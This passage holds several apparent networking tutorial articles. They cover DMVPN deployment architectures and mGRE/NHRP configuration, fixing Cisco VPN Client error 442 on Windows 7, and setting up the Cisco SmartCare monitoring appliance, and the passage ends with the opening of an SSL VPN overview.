We should note at this point that in Phase 1 DMVPN, all traffic passes through the Hub. In Phase 2 and Phase 3 DMVPN, spokes form spoke-to-spoke tunnels and send traffic directly to each other, bypassing the Hub.

The Single DMVPN - Single Tier Headend Architecture has the advantage of requiring only one Hub router, however, the Hub’s CPU is also the limiting factor for this deployment’s scalability as it undertakes all three control planes (NHRP, mGRE & IPSec protection). 

In addition, the Hub router and its link to the Internet are single points of failure in this design. If either of the two (Hub or Internet link) fails, the whole VPN network can be crippled.

This DMVPN model is a common approach for a limited-budget DMVPN network with a few remote branches. Routing protocols are also not required when implementing a single DMVPN network/cloud; instead, static routes can be used with the same end result.
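
As a minimal sketch of the static-route approach, assuming the mGRE tunnel subnet is 10.0.0.0/24 with the Hub at 10.0.0.1, a headquarters LAN of 192.168.0.0/24 and a spoke LAN of 192.168.1.0/24 behind a spoke with tunnel IP 10.0.0.11 (all addressing is illustrative):

! On a spoke router - reach the HQ LAN via the Hub's tunnel IP
ip route 192.168.0.0 255.255.255.0 10.0.0.1
!
! On the Hub - one static route per spoke LAN
ip route 192.168.1.0 255.255.255.0 10.0.0.11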

Single DMVPN Network/Cloud - Dual Tier Headend Architecture

The Single DMVPN Network/Cloud – Dual Tier Headend DMVPN deployment consists of two routers at the headquarters. The first router, R1, is responsible for terminating the IPSec connections to all spokes, offloading the encryption and decryption process from the main Hub behind it. The Hub router undertakes the termination of the mGRE tunnels, the NHRP server role and the processing of all routing protocol updates.

Single DMVPN - Dual Tier Headend architecture

The only real advantage offered by the Dual Tier Headend Architecture (Single DMVPN cloud) is that it can support a significantly greater number of spokes.

A limitation of the Dual Tier Headend Architecture is the absence of spoke-to-spoke connections: in Dual Tier DMVPN deployments, spoke-to-spoke tunnels are not supported.

Dual DMVPN Network/Cloud – Single Tier Headend Architecture

The Dual DMVPN topology with spoke-to-spoke deployment consists of two headend routers, Hub 1 and Hub 2.  Each DMVPN network (DMVPN 1 & DMVPN 2) represents a unique IP subnet, one is considered the primary DMVPN while the other is the secondary/backup DMVPN.

Dual DMVPN - Single Tier Headend architecture

The dynamic Spoke-to-Spoke tunnels created between branches must be within a single DMVPN network.  This means that spoke-to-spoke tunnels can only be created between spokes in the same DMVPN network. 

With Dual DMVPN – Single Tier Headend Architecture, each Hub manages its own DMVPN network. Each Hub undertakes the task of IPSec encryption/decryption, mGRE Tunnel termination and NHRP Server for its DMVPN network.  A routing protocol such as EIGRP or OSPF is usually implemented in this type of setup to ensure automatic failover in case the primary DMVPN fails.
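
A minimal sketch of how such failover is often achieved with EIGRP is shown below, assuming tunnel subnets of 10.0.0.0/24 (primary DMVPN) and 10.0.1.0/24 (backup DMVPN), a LAN of 192.168.1.0/24 and a higher delay on the backup tunnel so its routes are less preferred (the AS number, subnets and delay value are all illustrative):

router eigrp 90
 network 10.0.0.0 0.0.0.255
 network 10.0.1.0 0.0.0.255
 network 192.168.1.0
!
interface Tunnel 1
 ! backup DMVPN tunnel - increase the delay so EIGRP prefers routes via the primary DMVPN
 delay 2000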

Dual DMVPN – Single Tier Architecture is considered an extremely flexible and scalable setup as it combines the best of both worlds – that is, true redundancy with two separate Hubs and DMVPN networks, plus support for spoke-to-spoke tunnels.

Dual DMVPN Network/Cloud – Dual Tier Headend Architecture

The Dual DMVPN Network – Dual Tier Headend combines the previous two deployment methods in one setup. It consists of two Hubs that deal only with mGRE tunnels and NHRP services, each Hub managing its own DMVPN network.

Frontend routers R1 and R2 take care of all IPSec termination for all spokes, performing encryption/decryption as data enters or exits the IPSec tunnels.

Newer ISR G2 routers are capable of undertaking great quantities of number crunching for all VPN tunnels as they are equipped with hardware accelerated VPN modules that offload this process from the main CPU.

Dual DMVPN - Dual Tier Headend architecture

As with Dual DMVPN – Single Tier deployment model, each Hub manages its own DMVPN network and connections with its spokes. Routing protocols are a necessity to ensure automatic failover to the secondary DMVPN network in case the primary fails.

Unfortunately, as with all Dual Tier deployments, we lose the spoke-to-spoke ability, but this might not be a limitation for some.

Acknowledgements

We would like to thank Saravana Kumar from the Cisco VPN TAC Support team for his valuable feedback and help.

Summary

This article examined the different types of DMVPN deployments and covered the following deployment models: Single DMVPN Network/Cloud  - Single Tier Headend Architecture, Single DMVPN Network/Cloud  - Dual Tier Headend Architecture, Dual DMVPN Network/Cloud – Single Tier Headend Architecture and finally Dual DMVPN Network/Cloud – Dual Tier Headend Architecture.


Understanding Cisco Dynamic Multipoint VPN - DMVPN, mGRE, NHRP

Dynamic Multipoint VPN (DMVPN) is Cisco’s answer to the increasing demands of enterprise companies to be able to connect branch offices with head offices and between each other while keeping costs low, minimising configuration complexity and increasing flexibility.

Note: Users familiar with DMVPN can also visit our article Configuring Cisco Dynamic Multipoint VPN (DMVPN) - Hub, Spokes , mGRE Protection and Routing

With DMVPN, one central router, usually placed at the head office, undertakes the role of the Hub while all other branch routers are Spokes that connect to the Hub router so the branch offices can access the company’s resources. DMVPN consists mainly of two deployment designs:

  • DMVPN Hub & Spoke, used to perform headquarters-to-branch interconnections
  • DMVPN Spoke-to-Spoke, used to perform branch-to-branch interconnections

In both cases, the Hub router is assigned a static public IP Address while the branch routers (spokes) can be assigned static or dynamic public IP addresses.

cisco dmvpn introduction - basic diagram

DMVPN combines multipoint GRE (mGRE) Tunnels, IPSec encryption and NHRP (Next Hop Resolution Protocol) to perform its job, saving the administrator from having to define multiple static crypto maps while providing dynamic discovery of tunnel endpoints.

NHRP is a Layer 2 resolution protocol and cache, much like the Address Resolution Protocol (ARP) or Inverse ARP (Frame Relay).

The Hub router undertakes the role of the server while the spoke routers act as the clients. The Hub maintains a special NHRP database with the public IP Addresses of all configured spokes.

Each spoke registers its public IP address with the hub and queries the NHRP database for the public IP address of any destination spoke to which it needs to build a VPN tunnel.

dmvpn nhrp communication

The mGRE Tunnel Interface allows a single GRE interface to support multiple IPSec tunnels and dramatically helps to simplify the complexity and size of the configuration.

Following is an outline of the main differences between GRE and mGRE interfaces:

A GRE interface definition includes:

  • An IP address  
  • A Tunnel Source
  • A Tunnel Destination
  • An optional tunnel key
interface Tunnel 0
ip address 10.0.0.1 255.0.0.0
tunnel source Dialer1
tunnel destination 172.16.0.2
tunnel key 1

An mGRE interface definition includes:

  • An IP address
  • A Tunnel source
  • A Tunnel key
interface Tunnel 0
ip address 10.0.0.1 255.0.0.0
tunnel source Dialer1
tunnel mode gre multipoint
tunnel key 1

It is important to note that mGRE interfaces do not have a tunnel destination defined and therefore cannot be used alone. NHRP fills this gap by telling mGRE where to send the packets.
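
To illustrate how NHRP complements mGRE, the following is a minimal sketch of a spoke's tunnel configuration, assuming the Hub's tunnel IP is 10.0.0.1 and its public IP is 172.16.0.1 (the addresses, network-id and key are purely illustrative):

! Spoke mGRE tunnel - NHRP registers the spoke with the Hub (NHS) and maps the
! Hub's tunnel IP to its public IP so mGRE knows where to send packets
interface Tunnel 0
 ip address 10.0.0.2 255.0.0.0
 ip nhrp network-id 1
 ip nhrp nhs 10.0.0.1
 ip nhrp map 10.0.0.1 172.16.0.1
 ip nhrp map multicast 172.16.0.1
 tunnel source Dialer1
 tunnel mode gre multipoint
 tunnel key 1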

DMVPN Benefits

DMVPN provides a number of benefits which have helped make them very popular and highly recommended. These include:

  • Simplified Hub Router Configuration. No more multiple tunnel interfaces for each branch (spoke) VPN. A single mGRE interface and IPSec profile, without any crypto access lists, is all that is required to handle all Spoke routers. No matter how many Spoke routers connect to the Hub, the Hub configuration remains constant (a sample hub configuration is sketched right after this list).
  • Full Support for Spoke Routers with Dynamic IP Addressing. Spoke routers can use dynamic public IP Addresses. Thanks to NHRP, Spoke routers rely on the Hub router to find the public IP Address of other Spoke routers and construct a VPN Tunnel with them.
  • Dynamic Creation of Spoke-to-Spoke VPN Tunnels. Spoke routers are able to dynamically create VPN Tunnels between them as network data needs to travel from one branch to another.
  • Lower Administration Costs. DMVPN simplifies greatly the WAN network topology, allowing the Administrator to deal with other more time-consuming problems. Once setup, DMVPN continues working around the clock, creating dynamic VPNs as needed and keeping every router updated on the VPN topology.
  • Optional Strong Security with IPSec. Optionally, IPSecurity can be configured to provide data encryption and confidentiality. IPSec is used to secure the mGRE tunnels by encrypting the tunnel traffic using a variety of available encryption algorithms. More on GRE IPSec can be found on our Configuring P-to-P GRE VPN IPSec Tunnels article.
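
The sample hub configuration referred to above could look like the minimal sketch below; the addressing, NHRP network-id, tunnel key and IPSec profile name (DMVPN-PROT) are assumptions for illustration only:

! Single mGRE interface on the Hub - serves every spoke, no crypto access lists needed
interface Tunnel 0
 ip address 10.0.0.1 255.0.0.0
 ip nhrp network-id 1
 ip nhrp map multicast dynamic
 tunnel source Dialer1
 tunnel mode gre multipoint
 tunnel key 1
 tunnel protection ipsec profile DMVPN-PROT

The same interface serves every spoke, so adding a new branch requires no changes on the Hub.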

DMVPN Case Study - DMVPN = Configuration Reduction and Simplified Architecture

As stated, DMVPN greatly reduces the necessary configuration in a large scale VPN network by eliminating the necessity for crypto maps and other configuration requirements.

To help demonstrate the level of simplicity and dramatic reduction of administrative overhead, we’ve worked on an example from Cisco.com and made it a bit more realistic to help show how much DMVPN does really help when it comes to configuration complexity and length.

The following requirements have been calculated for a traditional VPN network of a company with a central hub and 30 remote offices. All GRE tunnels are protected using IPSec:

Before DMVPN With p-pGRE + IPSec Encryption

  • Single GRE interface for each spoke
  • All tunnels for each spoke (remote office) need to be predefined:
    • Use of static tunnel destination
    • Requires static addresses for spokes
    • Supports dynamic routing protocols
  • Large hub configuration (HQ Router)
    • 1 interface/spoke -> 30 spokes = 30 tunnel interfaces
    • 7 lines per spoke -> 30 spokes = 210 configuration lines
    • 4 IP addresses per spoke -> 30 spokes = 120 addresses
  • Addition of spokes requires changes on the hub
  • Spoke-to-Spoke traffic must pass through the hub.

The diagram below shows a point-to-point GRE VPN network. All spokes connect directly to the hub using a tunnel interface. The hub router is configured with three separate tunnel interfaces, one for each spoke:

dmvpn GRE tunnels hub-spoke

Each GRE tunnel between the hub and spoke routers is configured with its own unique network. For example, the GRE tunnel between the HUB and Remote Office 1 could use network 10.0.0.0/30, while the GRE tunnel between the HUB and Remote Office 2 could use 10.0.1.0/30, and so on.

In addition, the hub router has three GRE tunnels configured, one for each spoke, making the overall configuration more complicated.  In case no routing protocol is used in our VPN network, the addition of one more spoke would mean configuration changes to all routers so that the new spoke is reachable by everyone.

Lastly, traffic between spokes in a point-to-point GRE VPN network must pass through the hub, wasting valuable bandwidth and introducing unnecessary bottlenecks.
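
For comparison, a fragment of such a point-to-point GRE hub configuration might look like the sketch below, showing just two of the thirty tunnel interfaces; the spoke public IP addresses are examples and the subnets follow the /30 scheme described above:

! Tunnel to Remote Office 1
interface Tunnel 1
 ip address 10.0.0.1 255.255.255.252
 tunnel source Dialer1
 tunnel destination 198.51.100.1
!
! Tunnel to Remote Office 2
interface Tunnel 2
 ip address 10.0.1.1 255.255.255.252
 tunnel source Dialer1
 tunnel destination 198.51.100.2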

After DMVPN With mGRE + IPSec Encryption

  • One mGRE interface supports ALL spokes. Multiple mGRE interfaces are allowed, in which case each is a separate DMVPN.
  • Dynamic Tunnel Destination simplifies support for dynamically addressed spokes with the use of NHRP registration and dynamic routing protocols
  • Smaller hub configuration (HQ Router)
    • 1 interface for all 30 spokes = 1 tunnel interface
    • Configuration including NHRP for 30 spokes = 15 lines
    • All spokes in the same subnet -> 30 spokes = 30 addresses
  • No need to touch the hub for new spokes
  • Spoke-to-Spoke traffic via the hub or directly.

mGRE dramatically simplifies the overall setup and configuration of our VPN network. With mGRE, all spokes are configured with only one tunnel interface, no matter how many spokes they can connect to. All tunnel interfaces are part of the same network. In our diagram below, this is network 10.0.0.0/29.

dmvpn traffic dynamic spoke to spoke tunnel

Furthermore, spoke-to-spoke traffic no longer needs to pass through the hub router but is sent directly from one spoke to another.

It should be clear how much simpler and easier DMVPN with mGRE is when compared with IPSec VPN Crypto tunnels or point-to-point GRE.

Cisco DMVPN IOS Version Support

While DMVPN was introduced in earlier IOS releases (12.3(19)T), it is highly recommended to use the latest possible IOS. This will ensure VPN stability and access to new DMVPN features found only in the latest IOS releases.

Summary - More DMVPN Articles

It is evident that DMVPN is not just another VPN technology but a revolution in VPN architecture design. The flexibility, stability and easy setup it provides are second to none, making it pretty much the best VPN solution available these days for any type of network.

To learn how to configure a DMVPN network, you can read our Configuring Cisco Dynamic Multipoint VPN (DMVPN) - Hub, Spokes , mGRE Protection and Routing article.


Troubleshooting Cisco VPN Client Windows 7 - How To Fix Reason 442: Failed to Enable Virtual Adapter

This article shows how to fix the Cisco VPN Reason 442: Failed to enable Virtual Adapter error on the Windows 7 (32bit or 64bit) operating system. If you are a Windows 7 user, it's most likely you've stumbled into the Cisco VPN Client error message "Reason 442: Failed to enable Virtual Adapter". We provide a way to quickly fix this error and get your VPN client working. We also cover Windows 8 and Windows 10 operating systems.

cisco-vpn-client-error-442

Unfortunately the good old 'remove and reinstall' method won't get you far in this case, as the problem is not within the Cisco VPN client program but with Microsoft's Internet Connection Sharing (ICS) service.

Windows 8 32bit & 64bit users dealing with the same problem can refer to our Cisco VPN Client & Windows 8 (32bit & 64Bit) - Reason 442: Failed To Enable Virtual Adaptor - How To Fix It article.

Windows 10 32bit & 64bit can read our article Install & Fix Cisco VPN Client on Windows 10 (32 & 64 Bit). Fix Reason 442: Failed to enable Virtual Adapter.

Windows 10 32bit & 64bit Anniversary Update 1607 users can read our Fix Cisco VPN Client Break After Windows 10 Anniversary Update 1607.


Following the steps outlined below will help resolve this error and save you a lot of time and frustration:

1. Hit the start button and type 'services.msc' as shown:

cisco-vpn-client-error-442-2

2. Locate and stop Cisco Systems, Inc. VPN Service;

3. Stop and disable Internet Connection Sharing (ICS) Service;

4. Restart the Cisco Systems, Inc. VPN Service.

Launch the Cisco VPN Client again, and the problem is now gone!

Keep in mind that we are running Cisco Systems VPN Client version 5.0.07.0440 on Windows 7 Ultimate 64-bit edition, but we faced the same problem with other versions as well.

Note: It’s always a great idea to have the latest Cisco VPN client installed. Users can download the Cisco VPN client for Windows, Linux and MacOS operating systems by visiting our Cisco Tools & Applications download section.


Cisco SmartCare Update - Next Generation Appliance

It's been more than a year since we introduced the Cisco SmartCare service and appliance. It's been extremely popular and has successfully penetrated the Cisco market with installations continually increasing.

Since the presentation of the new SmartCare service on Firewall.cx some things have changed, which is the reason we decided to write  an update on the original article. 

Firstly, the Cisco SmartCare appliance has changed. With the termination of collaboration between Cisco and HP, Cisco no longer supplies HP-based SmartCare appliances; these have been replaced by IBM-based servers, which are a lot shorter and lighter.  The SmartCare appliance is much easier to install and doesn't require a lengthy rack to fit in properly.

While the operating system is still Linux, the distribution used now is the popular CentOS v5.3 with kernel version 2.6.18-128.el5 - essentially a repackaged RedHat Enterprise Linux. This operating system runs on 3.5 Gigs of installed memory and an Intel-based CPU. The hard drive is a Seagate Barracuda SATA 250GB spinning at 7200rpm.

As expected, the box the appliance arrives in is very small compared to the original SmartCare appliance. The box is similar to that of a Cisco 2960G Catalyst switch and contains mounting brackets plus a SATA cable and a few screws which we couldn't find a use for!

cisco smartcare appliance box


The Cisco Smart Care Service & Appliance

Cisco, as most IT engineers know, covers a wide range of products and services. These range from routers to switches, firewalls, intrusion prevention systems (IPS), intrusion detection systems (IDS), servers, wireless LAN controllers (WLC), wireless access points and much more.

What a lot of people aren't aware of is that most of these products come with a 90-day warranty - something that's really odd when compared with other vendors, who usually offer at least a one-year warranty. On the other hand, only a number of hand-picked Cisco devices come with a limited lifetime warranty - for example, the Cisco Catalyst switches (lower to mid-range models). Effectively, for these devices covered by the limited lifetime warranty, if they fail it takes 20-25 days for Cisco to replace them.

For the above, and many more reasons, you should always choose to purchase the additional warranty extension service for each device. This is known as a 'SmartNet service'.

The Cisco SmartNet service comes in many variations; however, in its most basic form, it extends the warranty of the device for which it is purchased by up to one year, with next business day (NBD) replacement. The SmartNet service also entitles you to download minor upgrades for the device's IOS or firmware.

The big problem with the SmartNet service is that when dealing with a lot of equipment, e.g. 8 routers, 15 switches and 2 firewalls, it can get quite tricky: you need to ensure the renewal of every SmartNet contract happens within a specific period, otherwise you'll need to pay a lot more money to renew it.

Sounds like a fussy and laborious task? Want more from Cisco than simple warranty coverage?

Enter the Cisco SmartCare service.....

The Cisco Smart Care service is the most advanced support service Cisco has offered to date. Due to the extensive features and services offered within the Smart Care service, we've broken the article down into smaller sections to make it easier to follow.

Cisco Smart Care Service

The Cisco Smart Care service is a new and much more sophisticated approach to covering expensive Cisco equipment. The Smart Care service aims to help simplify the whole process while providing a lot more for your money.

The Smart Care service of course covers completely everything the SmartNet service does, but also adds the following benefits:

  • Simplified Contract. Everything you have with a Cisco logo is covered under one contract.
  • Access to advanced Cisco Technical Assistance Center (TAC) for help around the clock.
  • Free Cisco Smart Care appliance (Hold on, we'll analyse this soon).
  • 24/7 Monitoring of your Cisco equipment.
  • Delivers dashboard visibility into network performance
  • Proactive network scanning for software vulnerabilities and security risks
  • Security assessments of your device configurations according to Cisco's security guidelines
  • VoIP assessment of your network (for networks with VoIP Smart Care services)
  • Cheaper coverage. As it turns out, the more Cisco equipment you cover, the cheaper it gets when compared to the traditional SmartNet service.

When your Cisco Smart Care service is purchased and enabled, you'll receive the Cisco Smart Care appliance within a couple of days.

Through this appliance, all Cisco network equipment covered under the Smart Care contract is monitored 24/7. This information is encrypted and sent directly to the Cisco Smart Care center for processing and is almost immediately made available to your Cisco Partner via the Smart Care portal.

Your Cisco partner can, and should, provide you with access to the Smart Care portal so you can see all information provided by Cisco, that is associated with your network. Reports and warnings generated by the Smart Care appliance are sent to your Cisco partner and can also be configured so you (the network administrator) receive them as well.

The Cisco Smart Care Appliance

The Cisco Smart Care appliance can only be deployed by your authorised Cisco Smart Care partner. Keep in mind that the Cisco 'Smart Care certified' certification is a separate certification in addition to the ones your partner might already have acquired. This means that no matter what certification level your Cisco partner has (SMB, Premier, Silver or Gold), they need to also be Smart Care certified.

The Cisco Smart Care appliance is basically an HP ProLiant DL server with the Cisco brand on it, much like the Cisco Call Manager servers. At the time, the model we received was powered by an Intel Celeron processor running at 3.2GHz with a 533MHz bus and was bundled with 1GB of RAM and a single Western Digital 74.6GB SATA hard drive.

tk-cisco-smartcare-1

We must agree that the specifications for this server are extremely low; however, because it's running on a customised Linux kernel, the specifications are adequate for the job. By the way, don't expect to find a floppy or DVD drive - they've been removed and replaced by plastic covers.

Speaking of covers, we thought it would be nice if we opened our Smart Care appliance and see what's inside it, and we did just that:

tk-cisco-smartcare-2

At first glance, the server's fanless CPU, RAM and SATA hard drive grab your attention. In front of the CPU you'll notice an array of fans designed to constantly blow cool air through the CPU's heatsink, keeping its temperature low while also cooling the motherboard and other circuits. This is a classic design for this type of server. On the lower left part of the picture you can see the server's power supply, with two additional fans in front that force cool air to enter from the front, passing over the hard drive and cooling it as well.

Turning the appliance around, you'll find all the necessary interfaces, including a serial port, which is all you really need to set up the server.

tk-cisco-smartcare-3

Provided with the server is a DB9 serial cable (shown below on the right side) which is basically a null-modem serial cable with the TX & RX pins in cross-over mode:

tk-cisco-smartcare-4

Since almost all laptops today do not feature a serial port, you'll need to use a USB-to-Serial adaptor like the one shown left in the above picture. Alternatively, you can simply connect a VGA monitor and a keyboard to proceed with the setup. We've decided to go ahead using the serial cable, rather than a monitor.

When you first power on the Smart Care appliance, you'll get the well-known BIOS POST test and a brief summary of the system's configuration as shown below:

tk-cisco-smartcare-5

Following the POST test is the system bootup, which doesn't really show anything other than a message telling you that it's booting the kernel. Once the system has loaded, it will prompt for a login name and password. The factory defaults for these are 'cisco' and 'cisco'.

tk-cisco-smartcare-6

The first step required once your Smart Care appliance boots up is to configure it with the appropriate network settings in order to obtain Internet access and update the appliance software.

Configuring the Appliance Network Settings

To configure the network settings, you need to enter Privileged Mode just as you would with a Cisco router or switch. Type 'enable' and enter 'admin' as the password when prompted.

You'll see the hash # character at the prompt, indicating you've now entered privileged mode. Typing ? will present all available options as shown below:

The conf ip command will launch a series of prompts asking for the system's IP Address, Subnet mask, Gateway, DNS servers and proxy server, however we highly advise you enable a DHCP server on your network that will provide all this information automatically.

Our approach was to use a DHCP server and by issuing the 'show net' command we were able to verify the correct settings of our Smart Care appliance:

tk-cisco-smartcare-8

As with all Cisco products, you can enter a simple 'ping' command toward a domain to ensure the DNS resolution process is working correctly and there is in fact connectivity with the Internet.

tk-cisco-smartcare-9

Updating the Cisco Smart Care Appliance

Updating the Cisco Smart Care appliance is a necessity because if you don't upgrade it, it simply won't work.

The first time we performed the update, we had a problem downloading the new image and were required to open a Cisco TAC case as the appliance is not able to automatically find the necessary update and download it. Hopefully this will be fixed in the newer versions of the appliance so updating it would simply mean to execute a command and nothing more.

Invoking the update process is easy: at the # prompt, simply type the command update and hit enter. The Cisco Smart Care appliance will ask you to confirm the upgrade of the client:

tk-cisco-smartcare-10

After answering y for yes, the system will move to the 'client update' page to continue the process.

The client update page is very simple and requests the following two pieces of information:

1) URL from which the Cisco Smart Care appliance is able to download the necessary image

2) Cisco Connection Online (known as 'CCO') account name & password

Keep in mind that when entering your CCO password, the system will not show it on the screen, but instead the field is kept blank:

tk-cisco-smartcare-11

The URL seems a bit weird at first glance because of its length; the system wraps it at the end of the screen, giving it an awful look. Assuming all the information provided is correct, the Cisco Smart Care appliance will automatically start downloading the new update, providing you with constant feedback on the download speed. The image download is about 55MB, so if you're on a fast ADSL connection, it's a matter of minutes.

This update can only be performed online. You cannot download the image and install it from your computer as you would with an IOS image!

As soon as the image download is complete, you are prompted with a few details about the installation that will proceed, plus a final confirmation that you wish to perform the update:

tk-cisco-smartcare-12

After you press 'y' and 'enter', confirming to proceed with the update, the system will start to unpack the image it downloaded and begin the installation as shown below:

tk-cisco-smartcare-13

The installation process is easily monitored through the stars * on the screen. We don't know exactly what one star represents, but that doesn't really matter :) As soon as the update is complete, the system notifies the installer with an 'Installation Complete' message and immediately begins the restart process to load the newly updated software.

When the Cisco Smart Care appliance completes its reboot, you'll need to perform the whole login process again until you reach the '#' prompt. At that point, we can issue the '?' command and see the available menu options. If you compare the options with the ones before the update (shown at the beginning of this page - first screenshot), you'll see there is a noticeable difference.

tk-cisco-smartcare-14

Now that we have updated the Cisco Smart Care appliance, we need to register it with Cisco. This registration is necessary so we can finally tie the appliance to the end customer.

To kick-start the registration, simply enter the 'register' command and the registration screen will make its appearance:

tk-cisco-smartcare-15

Taking the settings from top to bottom, we leave the first three options as they are and move to the fourth, where we enter the partner CCO account and password again. Next, we can provide a name for the appliance to help us indicate which customer it is for. The name above has been smudged out to ensure privacy.

We confirm at the end that all the above information is correct and the appliance proceeds to contact Cisco and register itself. A confirmation message is shown, indicating that the registration was successful.

Assigning & Enabling the Cisco Smart Care Appliance

Once the Cisco Smart Care appliance has registered with Cisco, we need to assign it to the end customer. This process binds the appliance to the specific customer and the contract involved.

For this process, the partner must log into the Cisco Smart Care portal.

The main page at the Cisco Smart Care portal provides all the necessary configuration and monitoring options for all appliances installed.

From the menu on the left, we select the Administration menu and then Assessment Appliances to assign the registered appliance to the appropriate customer.

When selected, the Assessment Appliances screen will show all registered appliances no matter what state they are in. As shown in the screenshot below, our hardware client is registered, but remains unassigned to the customer.

tk-cisco-smartcare-17

To assign the appliance, we select the appliance and then click on the Assign/Unassign button located on the lower left corner of the Cisco Network Assessment Appliances table.

Once the Assign/Unassign button is pressed, a final confirmation is required before the assignment process begins. After confirming by pressing OK, the process begins:

tk-cisco-smartcare-18

The Cisco Smart Care portal will contact the appliance and after a brief secure exchange of data, the appliance will be assigned to the customer.

tk-cisco-smartcare-19

Once this phase of the process is complete, we need to enable the Smart Care appliance installed at the customer's site. To do this, under the customer's menu, we select Administration and then Assessment Appliance Configuration.

Once the page loads, we click on view and wait for the next window to open.

tk-cisco-smartcare-20

The next page provides us with the option to finally enable the network appliance installed at our customer's site. Click on the drop-down box, select Enabled and then click on the Save button.

tk-cisco-smartcare-21

Once the Save button is pressed, the Smart Care portal will queue the necessary commands and send them to the Smart Care appliance to enable it, providing the Cisco engineer with a number of additional tasks within the Smart Care portal.

tk-cisco-smartcare-22

Discovering Cisco Devices

As soon as the appliance is enabled, the Smart Care portal will refresh and show its status alongside the services activated and their respective versions. This particular customer has a Level 3 service which includes routing, switching and voice services (Cisco Unified CallManager Express).

Level 3 services indicate a higher complexity network and therefore offer additional services such as Voice Monitor, Voice Quality Monitor and other related services as shown in the screenshot above.

At this point, we need to discover our Cisco network devices and add them to the portal. This process is usually handled during the contract setup by your Cisco Partner, and therefore all covered equipment is already listed with its product codes and serial numbers; however, the system does not contain any IP Addresses, SNMP passwords (required for the SmartCare appliance to connect to the devices) etc.

We now head over to the Discovered Devices menu on the left and click the Perform New Discovery button which brings up the Service Control screen where we can run a number of services by either scheduling them or running them at that moment.

The first step here is to select the Run Now... button which will trigger the 3-step discovery process so that the Smart Care appliance can discover all Cisco devices that will be included in the Smart Care contract. These devices will be permanently monitored by the appliance once added.

tk-cisco-smartcare-24

The first step involves the Cisco engineer inserting the network subnets that need to be scanned by the appliance to discover the Cisco devices. Scrolling further below (not shown) the system requires the SNMP string which will be used to connect to each discovered device and obtain all necessary information. As it is evident, SNMP must be enabled on all Cisco devices we want to be discovered, using a read-only string.

This technique is favourable because it allows you to control which equipment is added to the Smart Care contract. If the Smart Care appliance can't 'see' it - it isn't added to the contract!

As soon as all the information is entered, hitting the Next button starts the scanning process as shown below:

tk-cisco-smartcare-25

The screen will show the discovered hosts in real time, and the process won't take longer than a couple of minutes to complete, depending on the number of hosts on the network.

As each device is successfully discovered, the system shows its Status, Device Type, Eligibility and Details. This will help ensure the correct devices are discovered.

In our first discovery process, the ASA 5510 appliances were not discovered due to the strict firewall policies in place. This was a reminder that when performing the discovery, you must ensure firewall access lists are not blocking SNMP queries to the devices.

Thankfully, we are able to re-run the discovery process and add the missing devices later on.

As soon as the process is complete, we are presented with the final table of discovered devices. Here we get the chance to make any last changes and select the proper device, in case the Smart Care appliance made a mistake - something we have never encountered so far.

tk-cisco-smartcare-26

Clicking on the Details button doesn't do much other than display the IP Address and SNMP MIB Tree information of the discovered device - slightly useless information we believe.

Now all that is needed is to hit the Save and Continue button so the system can add these devices to the Cisco Smart Care service so they become available to the customer's inventory.

tk-cisco-smartcare-27

The Cisco Smart Care service allows the Cisco Partner to run the discovery process and add devices to the service at any time; however, these additional devices (assuming they are not already covered) can force the Smart Care service device weight to jump to the next level. When this happens, an invoice is automatically generated and sent to the partner!

Therefore, to help avoid covering equipment accidentally, the system always provides a number of warnings before allowing you to accept the changes:

tk-cisco-smartcare-28

For this installation, all devices had been pre-inserted into the Smart Care portal in order to generate the initial quotation. As these devices are now discovered, we will see duplicate entries in the inventory. As a last step, we simply need to delete the older entries, effectively replacing them with the newly discovered devices.

Inventorying The Discovered Cisco Devices

After running the discovery service, if we visit the Discovered Devices section from the menu, the system will confirm the devices found already exist in the system and report that we need to run the inventory service:

Following the instructions, we select Services under the customer's Administration menu:

This will load the Service Control panel where we can execute on the spot a number of services or schedule them to automatically run at specific times and dates. The panel will also show when exactly the available services were executed.

To continue our setup, we select the Run Now... button to initiate the Inventory service.

tk-cisco-smartcare-31

Like most partner-initiated services, this is a 4-step process where we select the discovered devices to be inventoried:

tk-cisco-smartcare-32

After selecting the devices to be inventoried and clicking the Next button, we are asked to enter the necessary credentials for each Cisco device, so that the Smart Care appliance can log into each device.

This might come as a surprise to some engineers, however it is necessary because the Cisco Smart Care appliance actually logs into each device and obtains a full list of all components installed, including part numbers, serial numbers, PVDMs (Cisco DSPs), slots in which cards are installed (for routers) and even Cisco Unity Express modules (if installed)!

The amount of information later on provided will surprise you as it is extremely comprehensive.

tk-cisco-smartcare-33

In case an incorrect username or password is entered, the system will report a failure to log into the affected device and we will be able to re-run the inventory service later on and enter the correct credentials. For any device whose credentials are correct, the SmartCare appliance will save this information for all future monitoring services to be run.

As we complete entering all information and select the protocol used to access each device, we can click on the Next button to start the inventory process:

tk-cisco-smartcare-34

At this point, the Smart Care portal queues the operation at the customer's Smart Care appliance and will begin to execute in a minute or two.

The time required to complete the inventory process will depend on the amount of devices and their complexity. For our setup, the process did not take more than 5 minutes to complete.

As soon as the process completes, we are presented with a brief summary and are able to Terminate (close) the window. This will take us back to the Service Control panel, where the Inventory will show as successfully executed along with a date and time.

tk-cisco-smartcare-35

With the inventory process complete, the last step is to schedule or run the Core, Security and Voice technology processes in order to examine and monitor the equipment discovered.

The Core, Security and Voice process is out of this article's scope and will be covered in future articles.

Summary

This article introduced the Cisco Smart Care service and explained the finer details of this service, which is delivered by Cisco Smart Care authorized partners only. We saw the setup process of the Smart Care appliance and the portal setup, including the discovery and inventorying of Cisco devices.

 

 


WEB SSL VPN - The Next Wave Of Secure VPN Services

Fifteen years ago, Virtual Private Network (VPN) access was a fairly new concept to most businesses. While large corporations already had a good head start with VPN technologies, the rest were just starting to realise the potential and possibilities provided by VPN connections. Vendors such as Cisco, Checkpoint, Microsoft and many more started to produce a variety of products that provided VPN services to businesses. Today, VPN is considered a standard feature in any serious security or routing product and is widely implemented throughout almost all companies.

Early VPN products required, as many still do today, their own client, which is usually installed on the remote workstation that requires access to the local network. The encryption methods and supported protocols made them either a very good choice, or simply a very bad one which could be easily compromised. These days, IPSec-based VPNs are a standard; using the IP Security protocol and a number of related protocols, they provide adequate security and encryption to ensure a session is secure and properly encrypted.

VPN clients are usually preconfigured by the company's IT department with the necessary details, and all end users need to do is launch the VPN program and enter their credentials. Once user credentials are verified, they are granted access to the company's network and all associated security policies (such as access control lists) are applied.

